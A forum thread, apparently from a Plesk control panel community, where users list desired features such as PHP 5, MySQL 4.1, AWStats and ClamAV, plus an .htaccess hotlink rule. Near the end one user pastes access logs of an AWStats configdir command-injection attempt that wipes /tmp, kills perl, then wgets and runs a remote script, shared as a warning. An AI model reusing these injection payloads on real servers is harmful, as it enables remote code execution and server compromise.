Top 5 wanted features

[MikeUN]

1> support for multiple hosting directories (i.e. allow me to host off of /home/httpd/vhosts and /home2/httpd/vhosts or home/httpd/vhosts and /home/httpd/vhosts2 so I can mount additional drives to grow

2> allow for remote service hosting, like offloading of my mysql database to another server, and still have all the functionality in the control panel (seamless integration)

3> PROFIT!!! ... (wait, wrong forum)

4> remove the silly licensing scheme of making me pay extra for control panel access to OSS applications like postgresql and spamassassin...

5> ... can't think of a fifth...

 

[Traged1]

Hotlink protection

You can stop servers from hotlinking your site's files by editing the .htaccess file in your site's httpdocs directory.

RewriteEngine on
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http://([a-z0-9]+\.)?your-domain\.com [NC]
RewriteRule \.(gif|jpe?g|png)$ - [F,NC,L]

 

[brandonp]

MySQL 4.1

My only request is MySQL 4.1 Support

 

[audun1]

Here is my top 5.

1) Access subdomain on www AND http:// not just http://
So I don’t have to edit the httpd all the time

2) Lower prices on SpamAssassin and postgresql license or just remove the silly block so we can use it…

3) Mysql 4 and php5 support.

4) Free support. We have already paid for the control panel. So its a little strange to pay so much for a little support. You gays in the Plesk team have one other firm to beat CPANEL…….

5) Lower PRICES ON EXTRA STUFF

Thanks and sorry for my bad English

 

[Herby]

1. AWSTATS
2. Improve Spamassassin (Better CP, send Spams to an IMAP Folder)
3. Faster possibility of up2date AppVault packages (rember all vulns in phpbb)
4. Improve Backup/Restore tools
5. Ability to copy Client and Domaintemplates for easier creation of new ones.

ty

 

[hostcorp]

1) Domain vhost/mail/dns aliasing
2) AWstats integration
3) ClamAV integration
4) Improved DB user control (multiple DBs per user and vice-versa).
5) Improved SpamAssassin support (different actions based on spam score)

 

[jcanals]

My top wanted features:

- Php-5 support
- MySQL 4.1
- Getting the correct client address (No ISP "transparent" proxy address). As this not permits the full use for the access white-list and SSH access.
- Domain parking (Aliases) so the aliases will not consume licenses.
- More flexible way to edit/maintain custom DNS records and zones.

 

[Traged1]

1. MySQL 4+

2. Gnu PGP email support integrated, should be setup for password retrieval and notifications

3. Hotlink protection button for clients and domain owners.

4. PHP applications in the Vault that actually work with PHP in SAFE_MODE or PHP running under SU_EXEC.

5. Updated CLI so that we can have all the new 7.5.x feature in the creation utils, IE; mambo cli reference, or maybe a build in list of all CLI commands.

 

[lvalics]

- Domain parking (Aliases) so the aliases will not consume licenses.

It will be in Power Toys 3.5 in a few days.
Also VHOST.CONF editing

 

[Piggie]

My list at this point maybe short being a new user.

1) Merge httpsdocs and httpdocs
2) cgi_bin for web_users
3) email for web_users with CP access
4) Have the subdomains just be a folder
off the web root, not in a separate space.

 

[roprop]

1. Application Vault: Possibility to restrict the applications to the customer (the application, not just its amount! Compare to '4PSA'...)
2. Fullfunctional subdomains (email, stats, ...), Subdomains with points (ex. www.sub.domain.xy)
3. AWStats
4. Better reseller accounts
5. 64 Bit for unix versions
6. MySQL 4.x, PHP5, Postfix
7. Move domains from a customer to another
   [/list=1]

 

[Griffith]

1.- MySQL 4.1
2.- PHP-5
3.- ClamAV integration
4.- Move domain to other client
5.- More Spamassassin options

 

[Mr.Yes]

Originally posted by smtalk
In my opinion, better change is:

<Directory /usr/local/psa/home/vhosts>
GroupOwner psacln
HideNoAccess On
HideGroup root
</Directory>

Because when you use HideUser, then you can't see subdomains, error_docs and other important directories.

hello, this could be perfect if Plesk do not set permission for subdomains folder to root.root

Until Plesk do not fix this, setting subdomains as ftpusr.psaserv, domain users cannot see their subdomains ... unless they use file manager.

 

[MerK]

1) PHP 5 Support
2) MySQL 4.1 Support
3) FREE Unlimited Virus Scanner
4) FREE Unlimited Spam Assassin
5) Fedora Core 3 & 4 Support

thats my 5

 

[Whistler]

Originally posted by MerK
2) MySQL 4.1 Support
4) FREE Unlimited Spam Assassin

2) MySQL 4.1 is already supported...

4) SpamAssassin is free... and unlimited...

;o)

 

[MerK]

Originally posted by Whistler
2) MySQL 4.1 is already supported...

4) SpamAssassin is free... and unlimited...

;o)

Spam Assassin control via plesk i meant.

 

[DanLuria]

1) DNS Templates (each site would be modeled after a template form a client or admin level)
2) Domain aliases
3) Multiple databases per user
4) Ability to set no bandwidth/space limits on domains at a client level
5) Global htaccess's (Not sure if it's feasible, but I'd want to be able to apply 'Options -Indexes' at a client level)

Also, I could have sworn I saw a feature to merge httpdocs and httpsdocs..

 

[ideawire_bb]

My top 5:

1. WebDAV
2. PHP 5 / MySQL 4
3. Latest phpMyAdmin
4-5. Pick from any of valid, good suggestions.

 

[nend]

I posted this a while back but so nobody forgets.

1. Ability to merge all directories into one - like httpdocs, httpsdocs, and cgi-bin.
2. Ability to password protect all directories no matter they be cgi-bin.

The next I post I really dont care for. In such they will make upgradeing probally hard.

3. Update the account system.
4. More better stats logs.
5. More control panel installable applications.

 

[devindull]

Adding AWSTATS is the stupidest mistake. AWSTATs is the primary way you get hacked, no matter if you are running concurrent data or not. Let me show you a record I have:
200.117.248.78 - - [20/Jul/2005:09:59:03 -0400] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.geocities.com/bam_boschet/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.117.248.78 - - [20/Jul/2005:09:59:03 -0400] "GET //awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.geocities.com/bam_boschet/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 286 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.117.248.78 - - [20/Jul/2005:09:59:03 -0400] "GET //awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.geocities.com/bam_boschet/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 286 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.117.248.78 - - [20/Jul/2005:09:59:03 -0400] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.geocities.com/bam_boschet/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.117.248.78 - - [20/Jul/2005:09:59:04 -0400] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.geocities.com/bam_boschet/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.117.248.78 - - [20/Jul/2005:09:59:04 -0400] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.geocities.com/bam_boschet/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.117.248.78 - - [20/Jul/2005:09:59:04 -0400] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.geocities.com/bam_boschet/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.117.248.78 - - [20/Jul/2005:09:59:04 -0400] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.geocities.com/bam_boschet/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.117.248.78 - - [20/Jul/2005:09:59:04 -0400] "GET //awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.geocities.com/bam_boschet/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 286 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.117.248.78 - - [20/Jul/2005:09:59:04 -0400] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.geocities.com/bam_boschet/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.117.248.78 - - [20/Jul/2005:09:59:04 -0400] "GET /cgi/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.geocities.com/bam_boschet/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 289 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.117.248.78 - - [20/Jul/2005:09:59:04 -0400] "GET /cgi/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.geocities.com/bam_boschet/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 289 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.117.248.78 - - [20/Jul/2005:09:59:04 -0400] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.geocities.com/bam_boschet/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.117.248.78 - - [20/Jul/2005:09:59:04 -0400] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.geocities.com/bam_boschet/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.117.248.78 - - [20/Jul/2005:09:59:04 -0400] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.geocities.com/bam_boschet/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.117.248.78 - - [20/Jul/2005:09:59:04 -0400] "GET /cgi/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.geocities.com/bam_boschet/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 289 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.117.248.78 - - [20/Jul/2005:09:59:04 -0400] "GET //awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.geocities.com/bam_boschet/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 286 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.117.248.78 - - [20/Jul/2005:09:59:04 -0400] "GET //awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.geocities.com/bam_boschet/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 286 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.117.248.78 - - [20/Jul/2005:09:59:05 -0400] "GET /stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.geocities.com/bam_boschet/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
2

That's a script kiddie scanning the domains for AWSTATS but can't find it. If he had found one, he could install hidden bncs, mechs, and all sorts of DoS ****.

Also, what Plesk needs is for each account/domain to have its own /tmp/ directory within its structure so that any created tmp files from sessions or what have you is stored within their own directories. This would aide in finding out which domain keeps being exploited, thus making it easier to see what person is running outdated/exploitable php/pl/cgi kind of things like PPBB, Vbulletin, PHPNuke, etc...

Oh and for the record, I know a lot of people who would change from Plesk if they moved into adding more exploitable additions to their setup. And a lot of people are seeking a panel that would do the /tmp/ structure per domain for the very reason of hijacking.